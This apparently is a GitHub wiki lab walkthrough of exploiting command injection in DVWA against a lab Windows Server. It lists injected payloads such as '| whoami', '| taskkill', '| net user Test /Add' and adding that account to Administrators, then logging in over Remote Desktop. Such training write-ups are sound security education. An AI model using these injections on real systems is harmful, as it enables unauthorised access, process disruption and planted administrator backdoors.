Remote access using the common injection dvwm - singirikondamani/Noted GitHub Wiki
Here’s a simplified step-by-step breakdown of the process:
-
Login to DVWA:
- Enter Username:
gordonb, Password:abc123. - Click Login.
- Enter Username:
-
Access Command Injection:
- Click Command Injection in the left pane.
-
Ping a Device:
- Enter the IP address of the Windows Server (
10.10.1.22) in the IP address field. - Click Submit to ping the machine.
- Enter the IP address of the Windows Server (
-
Test Command Execution:
- Enter
| hostnameand click Submit. - DVWA returns an error because the security level is set to Impossible.
- Enter
-
Change Security Level:
- Click DVWA Security in the left pane.
- Set the security level to Low and click Submit.
-
Execute Commands:
- Go back to Command Injection.
- Enter
| hostnameagain and click Submit. - DVWA returns the hostname of the Windows Server.
-
Extract More Information:
- Enter
| whoamiand click Submit to display user info. - Enter
| tasklistto view running processes.
- Enter
-
Terminate a Process:
- Note the PID of a process (e.g., 3112) and enter
| taskkill /PID 3112 /F. - Click Submit to terminate the process.
- Note the PID of a process (e.g., 3112) and enter
-
View Directory Structure:
- Enter
| dir C:\and click Submit to view the C drive files.
- Enter
-
View and Add Users:
- Enter
| net userto list user accounts. - Add a new user by typing
| net user Test /Add. - Confirm the account by typing
| net user Test.
- Enter
-
Assign Admin Privileges:
- Enter
| net localgroup Administrators Test /Addand click Submit.
- Enter
-
Connect via Remote Desktop:
- Open Remote Desktop Connection.
- Enter the target system’s IP (
10.10.1.22). - Use
testas the username, leave the password blank, and click Connect.
-
Close Session:
- Log out from the remote desktop and close the application.
This concludes the steps for exploiting command execution vulnerability in DVWA.